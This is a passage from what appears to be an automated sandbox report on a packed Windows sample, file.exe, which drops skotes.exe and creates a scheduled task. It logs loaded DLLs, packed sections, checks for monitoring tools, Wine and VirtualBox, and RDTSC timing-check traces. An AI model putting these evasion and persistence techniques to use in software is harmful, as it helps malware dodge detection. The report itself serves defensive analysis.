                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1884672 > 1048576
                    Source: file.exeStatic PE information: Raw size of iaxkupqh is bigger than: 0x100000 < 0x19a600

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: file.exeStatic PE information: real checksum: 0x1d18cc should be: 0x1dc00d
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1d18cc should be: 0x1dc00d
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: iaxkupqh
                    Source: file.exeStatic PE information: section name: fnhucfqp
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: iaxkupqh
                    Source: skotes.exe.0.drStatic PE information: section name: fnhucfqp
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D7D91C push ecx; ret 6_2_00D7D92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_053E0DDC push 0000005Bh; retn 0008h6_2_053E0DE3
                    Source: file.exeStatic PE information: section name: entropy: 7.989396011362113
                    Source: file.exeStatic PE information: section name: iaxkupqh entropy: 7.954913292155413
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.989396011362113
                    Source: skotes.exe.0.drStatic PE information: section name: iaxkupqh entropy: 7.954913292155413
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D237F3 second address: D2384B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FD2884F85F0h 0x0000000b jmp 00007FD2884F85D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85CAh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23A08 second address: D23A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BC0 second address: D23BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D2C second address: D23D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A71h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D42 second address: D23D4C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2884F85CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27CB4 second address: D27CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27E46 second address: D27EB0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b je 00007FD2884F85C6h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 jmp 00007FD2884F85CEh 0x0000001a pop ecx 0x0000001b nop 0x0000001c mov edi, dword ptr [ebp+122D383Bh] 0x00000022 push 00000000h 0x00000024 mov esi, dword ptr [ebp+122D3933h] 0x0000002a call 00007FD2884F85C9h 0x0000002f jmp 00007FD2884F85D1h 0x00000034 push eax 0x00000035 jbe 00007FD2884F85CEh 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jc 00007FD2884F85CCh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EB0 second address: D27EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EB4 second address: D27EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EB9 second address: D27EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jc 00007FD288CC4A6Ch 0x00000010 jnp 00007FD288CC4A66h 0x00000016 pushad 0x00000017 jnl 00007FD288CC4A66h 0x0000001d jp 00007FD288CC4A66h 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EE7 second address: D27EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27EEC second address: D27F3F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d movzx ecx, dx 0x00000010 call 00007FD288CC4A77h 0x00000015 mov edx, 1FD70263h 0x0000001a pop edi 0x0000001b push 00000003h 0x0000001d movzx edx, di 0x00000020 push 00000000h 0x00000022 pushad 0x00000023 popad 0x00000024 push 00000003h 0x00000026 mov ecx, 0D0EC504h 0x0000002b push DB004F92h 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD288CC4A6Eh 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27F3F second address: D27F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 1B004F92h 0x0000000e mov edx, dword ptr [ebp+122D36F7h] 0x00000014 xor edi, 4D752C05h 0x0000001a lea ebx, dword ptr [ebp+1244CBCDh] 0x00000020 mov cl, B9h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27F68 second address: D27F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27F6C second address: D27F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28045 second address: D280D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 37E40C1Fh 0x00000010 mov edx, dword ptr [ebp+122D371Fh] 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD288CC4A68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push 00000000h 0x00000034 and esi, dword ptr [ebp+122D3787h] 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FD288CC4A68h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jno 00007FD288CC4A6Bh 0x0000005c push B9AE7F07h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FD288CC4A79h 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48B93 second address: D48B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48B97 second address: D48BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48BA5 second address: D48BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48BAB second address: D48BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D117D0 second address: D117E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D117E5 second address: D117EF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47043 second address: D4704A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4704A second address: D47090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FD288CC4A7Ch 0x0000000b jmp 00007FD288CC4A76h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jbe 00007FD288CC4A6Ah 0x00000019 push eax 0x0000001a pop eax 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007FD288CC4A70h 0x00000022 jbe 00007FD288CC4A6Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4736D second address: D47371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4767B second address: D47685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47948 second address: D4794C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4794C second address: D47952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47A84 second address: D47A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47A89 second address: D47AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD288CC4A66h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FD288CC4A76h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B07A second address: D3B07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F231 second address: D1F254 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A71h 0x00000011 js 00007FD288CC4A66h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA5E second address: D4FA80 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD2884F85D6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FCB4 second address: D4FCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E1C second address: D54E3A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2884F85C6h 0x00000008 jmp 00007FD2884F85D0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E3A second address: D54E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD288CC4A74h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E5C second address: D54E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E60 second address: D54E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E66 second address: D54E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD2884F85CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E7C second address: D54E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54515 second address: D5451D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5451D second address: D54521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54521 second address: D54543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54B29 second address: D54B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54B2F second address: D54B34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
